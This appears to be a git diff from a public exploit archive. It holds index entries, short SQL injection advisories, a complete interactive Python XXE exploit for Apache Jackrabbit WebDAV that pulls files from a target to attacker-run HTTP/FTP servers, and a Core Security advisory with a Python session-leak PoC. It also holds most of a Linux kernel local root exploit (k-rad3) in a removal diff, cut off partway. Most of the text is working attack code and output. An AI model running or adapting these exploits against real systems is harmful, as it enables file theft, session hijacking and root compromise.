Achor",perl,webapps,0 +37118,platforms/php/webapps/37118.txt,"SKYUC 3.2.1 'encode' Parameter Cross Site Scripting Vulnerability",2012-04-27,farbodmahini,php,webapps,0 +37119,platforms/asp/webapps/37119.txt,"XM Forum 'id' Parameter Multiple SQL Injection Vulnerabilities",2012-04-27,"Farbod Mahini",asp,webapps,0 +37120,platforms/php/webapps/37120.txt,"Uiga FanClub 'p' Parameter SQL Injection Vulnerability",2012-04-27,"Farbod Mahini",php,webapps,0 +37121,platforms/asp/webapps/37121.txt,"BBSXP CMS Multiple SQL Injection Vulnerabilities",2012-04-27,"Farbod Mahini",asp,webapps,0 +37122,platforms/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 'id' Parameter SQL Injection Vulnerability",2012-04-28,eidelweiss,php,webapps,0 +37123,platforms/php/webapps/37123.txt,"WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross Site Scripting Vulnerability",2012-04-30,Am!r,php,webapps,0 +37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 (Registration ID) Buffer Overflow PoC",2015-05-26,LiquidWorm,windows,dos,0 diff --git a/platforms/asp/webapps/37119.txt b/platforms/asp/webapps/37119.txt new file mode 100755 index 000000000..35dae5c3d --- /dev/null +++ b/platforms/asp/webapps/37119.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/53292/info + +XM Forum is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/[patch]/profile.asp?$sid=&id=[SQL] +http://www.example.com/[patch]/forum.asp?$sid=&id=[SQL] +http://www.example.com/[patch]/topic.asp?$sid=&id=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/37121.txt b/platforms/asp/webapps/37121.txt new file mode 100755 index 000000000..a15e231c5 --- /dev/null +++ b/platforms/asp/webapps/37121.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/53298/info + +BBSXP CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/ShowPost.asp?ThreadID=[SQL] +http://www.example.com/blog.asp?id=[SQL] +http://www.example.com/ShowForum.asp?ForumID=[SQL] +http://www.example.com/Profile.asp?UserName=[SQL] +http://www.example.com/print.asp?id=[SQL] \ No newline at end of file diff --git a/platforms/java/webapps/37110.py b/platforms/java/webapps/37110.py new file mode 100755 index 000000000..6ef02fd0b --- /dev/null +++ b/platforms/java/webapps/37110.py @@ -0,0 +1,382 @@ +#!/usr/bin/env python +""" +# Exploit Title: Jackrabbit WebDAV XXE +# Date: 25-05-2015 +# Software Link: http://jackrabbit.apache.org/jcr/ +# Exploit Author: Mikhail Egorov +# Contact: 0ang3el () gmail com +# Website: http://0ang3el.blogspot.com +# CVE: CVE-2015-1833 +# Category: webapps + +1. Description + +Jackrabbit WebDAV plugin use insecurely configured XML parser to parse +incoming PROPPATCH and PROPFIND requests. As a result it is vulnerable to +XXE attacks. +Besides Jackrabbit JCR, WebDAV plugin is incorporated into the following +software: Apache Sling, Adobe AEM. + +2. Proof of Concept + +Download vulnerable Apache Sling launchpad web application from here - +https://sling.apache.org + +Start launchpad web application as follows: +root@kali:~/build-sling# java -jar +org.apache.sling.launchpad-8-SNAPSHOT-standalone.jar + +Launch exploit with the following command: +root@kali:~# python cve-2015-1833.py --url http://127.0.0.1:8080/content/xxe +--tech oob --ip 127.0.0.1 +enter command> get . + +loaded 210 bytes in buffer + +enter command> show + +apache-maven-3.0.5 +apache-maven-3.0.5-bin.tar.gz +derby.log +eclipse +hs_err_pid5379.log +org.apache.sling.launchpad-8-SNAPSHOT-standalone.jar +python-workspace + +enter command> store /tmp/cwd.lst + +buffer content has been stored in file /tmp/cwd.lst + +enter command> exit +root@kali:~# + +Exploit have three exploitation techniques: +* inb1 - inbound XXE technique, it first writes content as attribute value +of controllable JCR node using PROPPATCH request and then retrieves content +using PROPFIND request +* inb2 - same as inb1, but there is some XML magic to retrieve content that +is not valid XML data +* oob - out-of-bound technique, utilizes FTP hack from this blog +http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html +Technique inb2 is the most stable. But it requires credentials of the user +that is able to modify some JCR node. Attacker host must have "visible ip" +which is required for communication between target and attacker's host. +Technique oob works even with anonymous credentials. But it is not so +stable as inb2 technique. +Technique inb1 does not require "visible ip", but there are limitations on +retrieved content. + +3. Solution: + +If you use Apache Jackrabbit, install version 2.10.1. +http://www.apache.org/dist/jackrabbit/2.10.1/RELEASE-NOTES.txt +""" +from urllib2 import * +import sys, string, random +import base64 +import xml.etree.ElementTree as ET +import BaseHTTPServer, SimpleHTTPServer +from multiprocessing import Process, Value, Manager +from optparse import OptionParser +import socket, select + +usage= """ + %prog --url --tech inb1 [ --creds ] + + %prog --url --tech inb2 --ip [ --creds --hport ] + + %prog --url --tech oob --ip [ --creds --hport --fport ] +""" + +help_interpreter = """ + help - print this help. + + get - retrieve directory listing or file content and store it inside internal buffer. You can use "." to denote current directory (e.g. use "get ." for cwd listing). + + show - show content of internal buffer. + + store - store internal buffer in file. + + exit - stop exploiting + """ + +failure_descr = """ +Possible reasons: + 1. Inappropriate technique, try another options. + 2. You do not have permissions to read file or list directory. + 3. Target is not exploitable. +""" + +rand_attr = '' +script_name = sys.argv[0].split('/')[-1] + +buffer_with_loot = '' + +url, tech, ip, creds, hport, fport = [None] * 6 + +http_server, ftp_server = [None] * 2 + +class HTTP_XXE(): + def __init__(self, ip, port, fport): + self.port = port + self.ip = ip + self.fport = fport + + def run(self): + class http_handler(BaseHTTPServer.BaseHTTPRequestHandler): + def __init__(self, ip, fport,*args): + self.ip = ip + self.fport = fport + BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args) + + def do_GET(self): + if "inb2" in self.path: + self.send_response(200) + self.send_header('Content-type','application/xml') + self.end_headers() + self.wfile.write('') + + if "oob" in self.path: + self.send_response(200) + self.send_header('Content-type','application/xml') + self.end_headers() + self.wfile.write('">%%all;' % {'ip' : self.ip, 'port' : self.fport}) + + def log_message(self, format, *args): # silent HTTP server + return + + def serve(httpd): + while True: + httpd.handle_request() + + handler = lambda *args: http_handler(self.ip, self.fport, *args) + httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', self.port), handler) + self.proc = Process(target = serve, args = (httpd,)) + self.proc.start() + + def stop(self): + self.proc.terminate() + +class FTP_XXE(): + def __init__(self, port): + self.port = port + + def run(self): + class ftp_handler(): + def __init__(self, port): + self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + self.server.setblocking(0) + self.server.bind(('0.0.0.0', port)) + self.server.listen(5) + + def serve(self, d): + inputs = [self.server] + while True: + readable, writable, exceptional = select.select(inputs, [], []) + + for s in readable: + if s is self.server: + connection, client_address = s.accept() + connection.setblocking(0) + inputs.append(connection) + + connection.send("220 xxe-ftp-server\n") + else: + data = s.recv(1024) + + if not data: + inputs.remove(s) + continue + + if "USER" in data: + s.send("331 password please - version check\n") + else: + s.send("230 more data please!\n") + if not len([x for x in ["PASS","EPSV","EPRT","TYPE"] if x in data]): + d['loot'] += data + + self.d = Manager().dict() + self.d['loot'] = '' + + ftpd = ftp_handler(self.port) + self.proc = Process(target = ftpd.serve, args=(self.d,)) + self.proc.start() + + def stop(self): + self.proc.terminate() + + def clean_buf(self): + self.d['loot'] = '' + + def get_loot(self): + loot = self.d['loot'] + + # clean data + loot = loot.replace('\r\nRETR ','/') + loot = loot.replace('\r\nCWD ','/') + loot = loot.replace('CWD ','',1) + loot = loot.replace('RETR ','',1) + + return loot + +def exploit(url, technique, creds = 'anonymous:anonymous'): + + global buffer_with_loot, rand_attr + + requests = { + 'inb1' : { + 'PROPPATCH' : ' ]> <%(attr_name)s>&loot; ', + 'PROPFIND': ' ' + }, + + 'inb2' : { + 'PROPPATCH' : ' "> %%dtd; ]> <%(attr_name)s>&all; ', + 'PROPFIND': ' ' + }, + + 'oob' : { + 'PROPFIND': ' %%dtd; %%send; ]> ' + } + } + + def request(url, verb, data, creds, timeout): + req = Request(url, data) + req.add_header('User-Agent', script_name) + req.add_header('Content-Type', 'application/xml') + req.add_header('Authorization', 'Basic ' + base64.b64encode(creds)) + req.get_method = lambda: verb + + #req.set_proxy('127.0.0.1:8081','http') ### For debug + + resp = None + try: + resp = urlopen(req, timeout = timeout).read() + except Exception, e: + pass + + return resp + + while 1: + cmdline = raw_input('\033[33menter command> \033[0m') + cmdline = re.sub('\s+', ' ', cmdline) + cmd = cmdline.split(' ')[0] + arg = cmdline.split(' ')[-1] + + if cmd not in ['help', 'get', 'show', 'store', 'exit']: + print '\n\033[36mno such command, use help for command list \033[0m\n' + continue + + if cmd == 'exit': + break + + if cmd == 'help': + print '\033[36m' + help_interpreter + '\033[0m' + continue + + if cmd == 'show': + print '\n\033[36m' + buffer_with_loot + '\033[0m' + continue + + if cmd == 'store': + with open(arg,'w') as outf: + outf.write(buffer_with_loot) + + print '\n\033[32mbuffer content has been stored in file ' + arg + '\033[0m\n' + continue + + if cmd == 'get': + if arg.startswith('.'): + arg = '/proc/self/cwd' + arg[1:] + arg = 'file://' + arg + + rand_attr = ''.join([random.choice(string.ascii_lowercase) for i in range(10)]) ### random attribute name where we place content + + if technique == 'inb1': + request1 = requests['inb1']['PROPPATCH'] % {'attr_name' : rand_attr, 'file' : arg} + request(url, 'PROPPATCH', request1, creds, timeout = 30) + + request2 = requests['inb1']['PROPFIND'] + loot = request(url, 'PROPFIND', request2, creds, timeout = 30) + + try: + buffer_with_loot = ET.fromstring(loot).findall('.//' + rand_attr)[0].text + except: + buffer_with_loot = '' + + if technique == 'inb2': + request1 = requests['inb2']['PROPPATCH'] % {'attr_name' : rand_attr, 'file' : arg, 'ip' : ip, 'port' : hport} + request(url, 'PROPPATCH', request1, creds, timeout = 30) + + request2 = requests['inb2']['PROPFIND'] + loot = request(url, 'PROPFIND', request2, creds, timeout = 30) + + try: + buffer_with_loot = ET.fromstring(loot).findall('.//' + rand_attr)[0].text.replace('<[CDATA[','').replace(']]>','') + except: + buffer_with_loot = '' + + if technique == 'oob': + request1 = requests['oob']['PROPFIND'] % {'file' : arg, 'ip' : ip, 'port' : hport} + request(url, 'PROPFIND', request1, creds, timeout = 8) + + buffer_with_loot = ftp_server.get_loot() + + ftp_server.clean_buf() + + len_ = sys.getsizeof(buffer_with_loot) - sys.getsizeof('') + print "\n\033[32mloaded %s bytes in buffer\033[0m\n" % len_ + if not len_: + print '\033[36m' + failure_descr + '\033[0m' + + continue + +def parse_options(): + global url, tech, ip, creds, hport, fport + + parser = OptionParser(usage = usage) + parser.add_option('--url', dest = url, help = 'url parameter') + parser.add_option('--tech', dest = tech, help = 'technique, valid values are: inb1, inb2, oob') + parser.add_option('--creds', dest = creds, help = 'user credentials, default value is anonymous:anonymous') + parser.add_option('--ip', dest = ip, help = 'ip address of netw interface that your target is able to access') + parser.add_option('--hport', dest = hport, help = 'port for HTTP server which will be launched during attack, default is 9998') + parser.add_option('--fport', dest = fport, help = 'port for FTP server which will be launched during attack, default is 9999') + + (options, args) = parser.parse_args() + + if not options.url or not options.tech: + print 'you must specify url and tech parameters' + sys.exit(2) + + if options.tech not in ['inb1', 'inb2', 'oob']: + print 'invalid tech parameter' + sys.exit(2) + + if options.tech != 'inb1' and not options.ip: + print 'you must specify ip parameter' + sys.exit(2) + + url = options.url + tech = options.tech + ip = options.ip + creds = options.creds if options.creds else 'anonymous:anonymous' + hport = options.hport if options.hport else 9998 + fport = options.fport if options.fport else 9999 + +parse_options() + +if tech != 'inb1': + http_server = HTTP_XXE(ip, hport, fport) + http_server.run() + + if tech == 'oob': + ftp_server = FTP_XXE(fport) + ftp_server.run() + +exploit(url, tech, creds) + +if tech != 'inb1': + http_server.stop() + +if tech == 'oob': + ftp_server.stop() \ No newline at end of file diff --git a/platforms/jsp/webapps/37114.txt b/platforms/jsp/webapps/37114.txt new file mode 100755 index 000000000..33595b826 --- /dev/null +++ b/platforms/jsp/webapps/37114.txt @@ -0,0 +1,145 @@ +1. Advisory Information + +Title: Sendio ESP Information Disclosure Vulnerability +Advisory ID: CORE-2015-0010 +Advisory URL: http://www.coresecurity.com/advisories/sendio-esp-information-disclosure-vulnerability +Date published: 2015-05-22 +Date of last update: 2015-05-22 +Vendors contacted: Sendio +Release mode: Coordinated release + + +2. Vulnerability Information + +Class: OWASP Top Ten 2013 Category A2 - Broken Authentication and Session Management [CWE-930], Information Exposure [CWE-200] +Impact: Security bypass +Remotely Exploitable: Yes +Locally Exploitable: No +CVE Name: CVE-2014-0999, CVE-2014-8391 + + + +3. Vulnerability Description + +Sendio [1] ESP (E-mail Security Platform) is a network appliance which provides anti-spam and anti-virus solutions for enterprises. Two information disclosure issues were found affecting some versions of this software, and can lead to leakage of sensitive information such as user's session identifiers and/or user's email messages. + + +4. Vulnerable Packages + +Sendio 6 (14.1120.0) +Other products and versions might be affected too, but they were not tested. + + +5. Vendor Information, Solutions and Workarounds + +Sendio informs us that [CVE-2014-0999] and [CVE-2014-8391] are fixed on Sendio software Version 7.2.4. + +For [CVE-2014-0999], the vulnerability only exists for HTTP web sessions and not HTTPS web sessions. Sendio recommends that customers who have not upgraded to Version 7.2.4 should disallow HTTP on their Sendio product and only use HTTPS. + + +6. Credits + +This vulnerability was discovered and researched by Martin Gallo from Core Security's Consulting Services Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security's Advisories Team. + + +7. Technical Description / Proof of Concept Code + +7.1. Disclosure of session cookie in Web interface URLs + +The Sendio [1] ESP Web interface authenticates users with a session cookie named "jsessionid". The vulnerability [CVE-2014-0999] is caused due the way the Sendio ESP Web interface handles this authentication cookie, as the "jsessionid" cookie value is included in URLs when obtaining the content of emails. The URLs used by the application follow this format: + + + http://:/sendio/ice/cmd/msg/body;jsessionid=?id= + +This causes the application to disclose the session identifier value, allowing attackers to perform session hijacking. An attacker might perform this kind of attack by sending an email message containing links or embedded image HTML tags pointing to a controlled web site, and then accessing the victim's session cookies through the "Referrer" HTTP header. Accessing this authentication cookie might allow an attacker to hijack a victim's session and obtain access to email messages or perform actions on behalf of the victim. + +7.2. Response mixup in Web interface + +The vulnerability [CVE-2014-8391] is caused by an improper handling of users' sessions by the Web interface. Under certain conditions, this could lead to the server disclosing sensitive information that was intended for a different user. This information includes, for instance, other users' session identifiers, email message identifiers or email message subjects. In order to trigger this vulnerability, requests should be authenticated. + +The following Python script can be used to trigger this vulnerability under certain circumstances: + + +import requests + +domain = "target.domain.com" # The target domain +port = 8888 # The target port +jsessionid = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" # A valid jsessionid +num = 100000 # No of request to make +msgid = 9999999 # A valid message id to baseline the requests + +url = "http://%s:%d/sendio/ice/cmd/msg/body;jsessionid=%s" % (domain, port, jsessionid) + + +def make_request(id): + params = {"id": str(id)} + headers = {"Cookie": "JSESSIONID=%s" % jsessionid} + return requests.get(url, params=params, headers=headers) + + +print "[*] Reaching the target to define baseline" +r = make_request(msgid) +baseline_length = r.headers["content-length"] +print "[*] Defined baseline: %d bytes" % baseline_length + +for id in range(0, num): + r = make_request(msgid) + rlength = int(r.headers["content-length"]) + if r.status_code == 200 and rlength != baseline_length: + print "\t", r.status_code, rlength, r.text + else: + print "\t", r.status_code, rlength + + + +8. Report Timeline + +2015-03-26: Core Security sent an initial notification to Sendio informing them that multiple vulnerabilities were found in one of their products, and requested their PGP keys in order to start an encrypted communication. +2015-03-27: Sendio replied that they would not be able to use PGP keys, but stated that their In/out SMTP gateway uses TLS, so that should suffice. They detailed that they were working on a fix for the "CS_SENDIO_JSESSIONID_DISCLOSURE" vulnerability and estimated it would be released by the end of April, 2015. They requested additional technical details for the "CS_SENDIO_INFO_LEAK" vulnerability. +2015-03-30: Core Security informed that understood that Sendio may not be able to use PGP keys, but Core doesn't consider the use of TLS as a replacement for PGP. Core Security requested to receive confirmation from Sendio in case they wanted to keep the communications unencrypted with PGP in order to send them a draft version of the advisory. +2015-03-30: Sendio confirmed that the communication can remain "as is" without PGP. They will inform Core once they have a specific date for publishing the fix. Sendio requested a PoC for the "CS_SENDIO_INFO_LEAK vulnerability". +2015-03-31: Core Security sent a draft version of the advisory and PoC to Sendio. +2015-03-31: Sendio confirmed reception of the advisory and PoC and informed Core that they would provide an update on their test on April 6. +2015-04-06: Sendio informed Core that they were able to reproduce the "CS_SENDIO_INFO_LEAK" issue and that were still analyzing it in order to create a fix. +2015-04-07: Core Security requested an estimated date for the release of a fix/update. +2015-04-13: Core Security again requested an answer from Sendio regarding the release of a fix/update. +2015-04-13: Sendio informed Core they were still working on a fix for the JSession issue that covers all use cases across Microsoft Outlook and the various supported web browsers. For the "CS_SENDIO_INFO_LEAK" they had coded a fix that was undergoing a System Test. Sendio estimated the release would take place on May 15, 2015. +2015-04-20: Sendio informed Core they were still planning to release the fixes by May 15, 2015. +2015-04-20: Core Security thanked Sendio for the update and informed them they would schedule their security advisory accordingly. +2015-04-24: Core Security requested that Sendio delay the release date of the fixes until Monday, May 18 in order to avoid publishing them on a Friday. +2015-04-27: Sendio informed Core that many of their customers have their Sendio systems set to "automatically update" on weekends. Sendio requested Core publish their advisory a week after the fix is published. Sendio also requested the ability to add some workarounds into Core's advisory. +2015-04-28: Core Security informed Sendio that they understood their update policy and let them know that it is Core's policy to publish their advisory the same day the fix is released in order to inform the affected users of its availability. Core also stated that they were willing to add any workarounds Sendio proposed. +2015-05-05: Sendio informed Core that they were still having problems developing a fix for the JSession vulnerability, therefore they may have to postpone the release date from May 15 to May 22. +2015-05-07: Core Security thanked Sendio for the update and requested to be kept informed in order to have enough time to schedule their advisory. +2015-05-12: Sendio confirmed that they needed to delay the publication of the fixes until May 21. Additionally, Sendio sent Core the proposed workarounds to be added in Core's advisory and requested a draft copy of it. +2015-05-15: Core Security informed Sendio it would reschedule the publication of their advisory and would send them a draft copy of it once they produced the final version. +2015-05-20: Sendio informed Core that they would publish the fixes at 10 PM, May 21. +2015-05-20: Core Security informed Sendio that based on their publication time they would have to delay the release of the advisory until Friday 22. +2015-05-22: Advisory CORE-2015-0010 published. + + +9. References + +[1] http://www.sendio.com/. + + +10. About CoreLabs + +CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. + + +11. About Core Security Technologies + +Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. + +Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. + + +12. Disclaimer + +The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ + + +13. PGP/GPG Keys + +This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. diff --git a/platforms/linux/local/1397.c b/platforms/linux/local/1397.c index a2d107be2..acb00a88f 100755 --- a/platforms/linux/local/1397.c +++ b/platforms/linux/local/1397.c @@ -1,730 +1,730 @@ -/* -* k-rad3.c - linux 2.6.11 and below CPL 0 kernel local exploit v3 -* Discovered and original exploit coded Jan 2005 by sd -* -********************************************************************* -* -* Modified 2005/9 by alert7 -* XFOCUS Security Team http://www.xfocus.org -* -* gcc -o k-rad3 k-rad3.c -static -O2 -* -* tested succeed : -* on default installed RHEL4(2.6.9-5.EL and 2.6.9-5.ELsmp) -* 2.6.9-5.EL ./k-rad3 -p 2 -* 2.6.9-5.ELsmp ./k-rad3 -a -p 7 -* on default installed maglic linux 1.2 -* MagicLinux 2.6.9 #1 ./k-rad3 -t 1 -p 2 -* -* thank watercloud tested maglic linux 1.2 -* thank eist provide RHEL4 to test -* thank sd share his stuff. -* thank xfocus & xfocus's firends -* -* -* TODO: -* CASE 1: use stack > 0xc0000000 -* CASE 2: CONFIG_X86_PAE define ,but cpu flag no pse -* -*[alert7@MagicLinux ~]$ ./k-rad3 -h -*[ k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ] -*[ Discovered Jan 2005 by sd ] -*[ Modified 2005/9 by alert7 ] -* -*Usage: ./k-rad3 -* -s forced cpu flag pse -* -a define CONFIG_X86_PAE,default none -* -e have two kernel code,default 0 -* -p alloc pages(4k) ,default 1. Increase from 1 to 7 -* The higher number the more likely it will crash -* -t default 0 -* 0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 -* -*[alert7@MagicLinux ~]$ ./k-rad3 -t 1 -p 2 -*[ k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ] -*[ Discovered Jan 2005 by sd ] -*[ Modified 2005/9 by alert7 ] -*[+] try open /proc/cpuinfo .. ok!! -*[+] find cpu flag pse in /proc/cpuinfo -*[+] CONFIG_X86_PAE :none -*[+] Cpu flag: pse ok -*[+] Exploit Way : 0 -*[+] Use 2 pages (one page is 4K ),rewrite 0xc0000000--(0xc0002000 + n) -*[+] thread_size 1 (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 -*[+] idtr.base 0xc0461000 ,base 0xc0000000 -*[+] kwrite base 0xc0000000, buf 0xbffed750,num 8196 -*[+] idt[0x7f] addr 0xffc003f8 -*[+] j00 1u(k7 k1d! -*[root@k-rad3 ~] #id -*uid=0(root) gid=0(root) groups=500(alert7) -* -* -* Linux Kernel <= 2.6.11 "sys_epoll_wait" Local integer overflow Exploit -* -* "it is possible to partially overwrite low kernel ( >= 2.6 <= 2.6.11) -* memory due to integer overflow in sys_epoll_wait and misuse of -* __put_user in ep_send_events" -* Georgi Guninski: http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html -* -********************************************************************* -* -* -* In memory of pwned.c (uselib) -* -* - Redistributions of source code is not permitted. -* - Redistributions in the binary form is not permitted. -* - Redistributions of the above copyright notice, this list of conditions, -* and the following disclaimer is permitted. -* - By proceeding to a Redistribution and under any form of the Program -* the Distributor is granting ownership of his Resources without -* limitations to the copyright holder(s). -* -* -* Since we already owned everyone, theres no point keeping this private -* anymore. -* -* http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html -* -* Thanks to our internet hero georgi guninski for being such incredible -* whitehat disclosing one of the most reliable kernel bugs. -* You saved the world, man, we owe you one! -* -* This version is somewhat broken, but skilled reader will get an idea. -* Well, at least let the scriptkids have fun for a while. -* -* Thanks to all who helped me developing/testing this, you know who you are, -* and especially to my gf for guidance while coding this. -* -*/ - -#define _GNU_SOURCE - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#ifndef __USE_GNU - #define __USE_GNU -#endif -#include -#include -#include -#include - -/** - * Relationship Variables - * - * 1: CONFIG_X86_PAE - * see /lib/modules/`uname -r`/build/.config - * 1.1: pse - * 2: THREAD_SIZE - * see include/asm/thread_info.h THREAD_SIZE define - */ - - -#define MAP (0xfffff000 - (1023*4096)) -#define MAP_PAE (0xfffff000 - (511*4096)) -#define MKPTE(addr) ((addr & (~4095)) | 0x27) -#define MKPMD(x) (0x1e3|0x004) - -//////////////////////////////////////////////// - -#define KRADPS1 "k-rad3" - -#define kB * 1024 -#define MB * 1024 kB -#define GB * 1024 MB - -#define KRS "\033[1;30m[ \033[1;37m" -#define KRE "\033[1;30m ]\033[0m" -#define KRAD "\033[1;30m[\033[1;37m*\033[1;30m]\033[0m " -#define KRADP "\033[1;30m[\033[1;37m+\033[1;30m]\033[0m " -#define KRADM "\033[1;30m[\033[1;37m-\033[1;30m]\033[0m " - -#define SET_IDT_GATE(idt,ring,s,addr) \ - (idt).off1 = addr & 0xffff; \ - (idt).off2 = addr >> 16; \ - (idt).sel = s; \ - (idt).none = 0; \ - (idt).flags = 0x8E | (ring << 5); - -//config val -static int havepse = 0; -static int definePAE = 0; -static int exploitway = 0; -static int npages = 1; -static int thread_size = 0; - - -static uid_t uid = 0; -static unsigned long long *clear1; -static char * progargv0; - -struct idtr { - unsigned short limit; - unsigned int base; -} __attribute__ ((packed)); - -struct idt { - unsigned short off1; - unsigned short sel; - unsigned char none,flags; - unsigned short off2; -} __attribute__ ((packed)); - - - -#define __syscall_return(type, res) \ -do { \ - if ((unsigned long)(res) >= (unsigned long)(-125)) { \ - errno = -(res); \ - res = -1; \ - } \ - return (type) (res); \ -} while (0) - - -#define _capget_macro(type,name,type1,arg1,type2,arg2) \ - type name(type1 arg1,type2 arg2) \ - { \ - long __res; \ - __asm__ volatile ( "int $0x80" \ - : "=a" (__res) \ - : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \ - __syscall_return(type,__res); \ - } - -static inline _capget_macro(int,capget,void *,a,void *,b); - -static int THREAD_SIZE_MASK =(-4096); - - -static void -fatal(const char *message) -{ - system("uname -a"); - printf("[-] %s\n",message); - exit(1); -} - -void kernel(unsigned * task) -{ - unsigned * addr = task; - /* looking for uids */ - - *clear1 = 0; - - while (addr[0] != uid || addr[1] != uid || - addr[2] != uid || addr[3] != uid - ) - addr++; - - addr[0] = addr[1] = addr[2] = addr[3] = 0; /* set uids */ - addr[4] = addr[5] = addr[6] = addr[7] = 0; /* set gids */ - -} - -void kcode(void); -void __kcode(void) -{ - asm( - "kcode: \n" - "cld \n" - " pusha \n" - " pushl %es \n" - " pushl %ds \n" - " movl %ss,%edx \n" - " movl %edx,%es \n" - " movl %edx,%ds \n"); - __asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) ); - asm( - " andl %esp,%eax \n" - " pushl (%eax) \n" - " call kernel \n" - " addl $4, %esp \n" - " popl %ds \n" - " popl %es \n" - " popa \n" - " cli \n" - " iret \n" - ); -} - - -void raise_cap(unsigned long *ts) -{ -/* must be on lower addresses because of kernel arg check :) */ -static struct __user_cap_header_struct head; -static struct __user_cap_data_struct data; -static struct __user_cap_data_struct n; - -int i; - -*clear1 = 0; -head.version = 0x19980330; -head.pid = 0; -capget(&head, &data); -/* scan the thread_struct */ -for (i = 0; i < 512; i++, ts++) -{ - /* is it capabilities block? */ - if ( (ts[0] == data.effective) && - (ts[1] == data.inheritable) && - (ts[2] == data.permitted)) - { - /* set effective cap to some val */ - ts[0] = 0x12341234; - capget(&head, &n); - /* and test if it has changed */ - if (n.effective == ts[0]) - { - /* if so, we're in :) */ - ts[0] = ts[1] = ts[2] = 0xffffffff; - return; - } - /* otherwise fix back the stuff - (if we've not crashed already :) */ - ts[0] = data.effective; - } -} -return; -} - - -void stub(void); -void __stub(void) -{ - asm ( - "stub:;" - " pusha;" - ); - __asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) ); - asm( - " and %esp, %eax;" - " pushl (%eax);" - " call raise_cap;" - " pop %eax;" - " popa;" - " iret;" - ); - -} - - -/* write to kernel from buf, num bytes */ -static int -kwrite(unsigned base, char *buf, int num) -{ -#define DIV 256 -#define RES 4 - -int efd, c, i, fd; -int pi[2]; -struct epoll_event ev; -int *stab; -unsigned long ptr; -int count; -unsigned magic = 0xffffffff / 12 + 1; - - printf("[+] kwrite base %p, buf %p,num %d\n", (void *)base,buf,num); - /* initialize epoll */ - efd = epoll_create(4096); - if (efd < 0) - return -1; - - ev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP; - - /* 12 bytes per fd + one more to be safely in stack space */ - count = (num+11)/12+RES; - - /* desc array */ - stab = alloca((count+DIV-1)/DIV*sizeof(int)); - - for (i = 0; i < ((count+DIV-1)/DIV)+1; i++) - { - - if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pi) < 0) - return -1; - - send(pi[0], "a", 1, 0); - stab[i] = pi[1]; - } - - /* highest fd and first descriptor */ - fd = pi[1]; - /* we've to allocate this separately because we need to have - it's fd preserved - using this we'll be writing actual bytes */ - epoll_ctl(efd, EPOLL_CTL_ADD, fd, &ev); - //printf("EPOLL_CTL_ADD count %u\n",count); - for (i = 0, c = 0; i < (count-1); i++) - { - int n; - n = dup2(stab[i/DIV], fd+2+(i % DIV)); - if (n < 0) - return -1; - epoll_ctl(efd, EPOLL_CTL_ADD, n, &ev); - close(n); - } - - /* in 'n' we've the latest fd we're using to write data */ - for (i = 0; i < ((num+7)/8); i++) - { - /* data being written from end */ - memcpy(&ev.data, buf + num - 8 - i * 8, 8); - epoll_ctl(efd, EPOLL_CTL_MOD, fd, &ev); - - /* the actual kernel magic */ - ptr = (base + num - (i*8)) - (count * 12); - struct epoll_event *events =(struct epoll_event *)ptr; - //printf("epoll_wait verify_area(%p,%p) addr %p %p\n",ptr,magic* sizeof(struct epoll_event) ,&events[0].events,magic); - int iret =epoll_wait(efd, (void *) ptr, magic, 31337); - if (iret ==-1) - { - perror("epoll_wait"); - fatal("This kernel not vulnerability!!!"); - - } - /* don't ask why (rotten rb-trees) :) */ - if (i) - { - //printf("epoll_wait verify_area(%p,%p) %p\n",ptr,magic* sizeof(struct epoll_event) ,magic); - iret = epoll_wait(efd, (void *)ptr, magic, 31337); - if (iret ==-1) - { - perror("epoll_wait"); - fatal("This kernel not vulnerability!!!"); - 